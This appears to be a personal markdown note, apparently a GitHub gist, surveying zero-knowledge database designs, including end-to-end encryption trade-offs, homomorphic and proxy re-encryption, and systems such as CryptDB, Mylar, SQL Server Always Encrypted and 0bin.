franckverrot/Zero_knowledge_db.md

## Zero_knowledge_db.md

      
    Raw
  

              Zero_knowledge_db.md
            
          
    Zero knowledge databases

The idea

The idea is to provide a database as a service to end users in such a way that no one except the user herself can access the data, not even the hosting provider or the database administrator.
Advantages


A privacy- and/or security-conscious user will have more trust in such a setup.
The service provider cannot be coerced to release the data they were trusted with, and he cannot be held responsible for the content he is storing.

Problem


With end-to-end encyption, all meaningful processing will have to be done client-side.
The server can basically only act as storage.
Even in its function as storage, it is hampered, as useful techniques such as de-duplication and compression are not applicable to encrypted data.

Exposed meta-data


Even in order to function as pure storage (and more so if advanced functionality such as indexing and searching is provided) some meta-data will have to be exposed to the service provider. Examples are file names, file types, access permissions.

Encryption in a relational database


For true zero-knowledge, end-to-end encryption, all data must be encrypted by the database client and sent to the database as ciphertext. As a result, the database can only store opaque blobs that it cannot operate on

no indexing
no searches
no calculations


This can be selectively applied, so that only the "sensitive data" is encrypted, whereas other pieces of data remain in clear text.
Some databases allow for automatic encryption/decryption to happen on the server. For Postgres there is the pgcrypto module. For that to work, however, the keys need to be transmitted to the database (but they are not stored there).

Postgres encryption options: http://www.postgresql.org/docs/current/static/encryption-options.html
SQL Server 2016 implements client-side encryption at the driver level ("Always Encrypted" mode, see below)
Trusting the client-software


Assuming end-to-end encryption is available, the user still has to trust the client software (to not steal her keys).
Option 1: User verifies source code herself (impractical)
Option 2: User trusts the service provider to provide proper client software (does not solve the trust problem)
Option 3: Some trustworthy independent vendor provides the client software (this is how web browsers work, probably requires standard protocol to be viable)

SaaS => not just the database


In a SaaS setup, the service provider does not just manage the database, but the whole software stack, including the core application logic and very often also the user interface. In this case, encrypting just the database does not help with the trust issue at all. The user would want all components in the stack to be inoperative without his explicit consent.
One way to implement this is to keep the processing logic in the application server, but have it provide the user the decryption keys when he logs in. However, the user would then have to trust the server operator to not steal and store the keys.
Moving the decryption to the real client greatly reduces the appeal of SaaS: not much more than simple storage can be provided, and the client needs to be "thick" and client-hosted/controlled (not just downloaded on the fly, because then it becomes untrustworthy)

Degrees of security and trust


There is no 100% secure solution anyway
Improved security is better already
There is a valid tradeoff to be made between more security and more functionality/performance/convenience
In order to decide on appropriate levels of security, be clear about the threat scenario ("who is the attacker?")
Privacy/security policies that cannot be enforced by technology can still be enforced by legislation or market forces (although one has to wonder if the majority of the end user market cares enough)
=> for example, publicly stated, independently verified, legally binding policy to encrypt all data at rest with user-supplied key that is never stored seems like a good thing

Homomorphic encryption

Homomorphic encryption is an encryption scheme whereby meaningful operations can be performed directly on encrypted data, producing encrypted results, that only the owner of the data can decrypt. The entity performing the calculation does not gain knowledge to the key, the data or the result.
That would allow to move calculations to an untrusted server.
Unfortunately, full homomorphic encryption is still very much a research effort, and not (yet?) practical.
However, some limited forms (for very specific calculations and/or leaking some information about the plaintext) are becoming available.
https://en.wikipedia.org/wiki/Homomorphic_encryption
http://www.zdnet.com/article/encryptions-holy-grail-is-getting-closer-one-way-or-another/
Proxy re-encryption

When sharing encrypted data with someone else, one has to either share the key, or re-encrypt the plaintext with a new key (for the recipient). Both approaches need access to the original key.
Proxy re-encryption schema are a limited form of homomorphic encryption that allows a third party (the proxy) to transform a ciphertext intended for user A into a ciphertext intended for user B. It requires the cooperation of user A, but no secret key nor the plaintext is exposed.
That way the proxy can forward encrypted messages on behalf of the original recipient.
https://en.wikipedia.org/wiki/Proxy_re-encryption
Some implementations

CryptDB


It works by executing SQL queries over encrypted data using a collection of efficient SQL-aware encryption schemes. CryptDB can also chain encryption keys to user passwords, so that a data item can be decrypted only by using the password of one of the users with access to that data. As a result, a database administrator never gets access to decrypted data, and even if all servers are compromised, an adversary cannot decrypt the data of any user who is not logged in.

http://css.csail.mit.edu/cryptdb/
The problem here is that the two techniques that CryptDB uses to allow queries to be processed (Determistic Encryption and Order Preserving Encryption) do leak quite a bit of information about the stored data. CryptDB recommends that these modes only be used for not really sensitive data. The question then arises why those need to be encrypted at all.
http://arstechnica.com/information-technology/2015/09/researchers-respond-to-developers-accusation-that-they-used-crypto-wrong/
Mylar


Mylar protects data confidentiality even when an attacker gets full access to servers. Mylar stores only encrypted data on the server, and decrypts data only in users' browsers. Simply encrypting each user's data with a user key does not suffice, and Mylar addresses three challenges in making this approach work. First, Mylar allows the server to perform keyword search over encrypted documents, even if the documents are encrypted with different keys. Second, Mylar allows users to share keys and data securely in the presence of an active adversary. Finally, Mylar ensures that client-side application code is authentic, even if the server is malicious.

http://css.csail.mit.edu/mylar/
Encrypted BigQuery Client


ebq enables storing of private data in encrypted form on BigQuery while supporting a meaningful subset of the client query types that are currently supported by these tools, maintaining scalable performance, and keeping the client data and the content of the queries as hidden as possible from the server.

https://github.com/google/encrypted-bigquery-client/blob/master/tutorial.md
SQL Server 2016 Always Encrypted


Always Encrypted makes encryption transparent to applications. An Always Encrypted-enabled driver installed on the client computer achieves this by automatically encrypting and decrypting sensitive data in the SQL Server client application. The driver encrypts the data in sensitive columns before passing the data to SQL Server, and automatically rewrites queries so that the semantics to the application are preserved. Similarly, the driver transparently decrypts data, stored in encrypted database columns, contained in query results.

https://msdn.microsoft.com/en-us/library/mt163865.aspx
iMessage

Apple's messaging service offers end-to-end encryption between all connected devices. Encryption and decryption happens on your devices using keys that never leave the secure storage area there, the iMessage servers only act as forwarding stores for ciphertext that they cannot read, and as a directory service to look up the recipient public keys.
However, you have to trust Apple that they do as they say. Having complete control over client and server software, they could have built in (or in the future build in) backdoors, for example to add lawful intercept capabilities.
ZeroDB


In ZeroDB, the client is responsible for the database logic. Data encryption, decryption and compression also happen client side. Therefore, the server never has any knowledge about the data, its structure or order.

http://www.zerodb.io
0bin - encrypted paste bin

0bin is a client-side encrypted online pasteboard service.
Javascript in the browser creates a secret key for each file, and only the encrypted data is uploaded and stored. The secret key is part of the URL assigned to the file (the "hash", which is not transmitted to the server). As a user, you must store that URL otherwise the file becomes inaccessible. Sharing also works by sharing the URL.
http://0bin.net/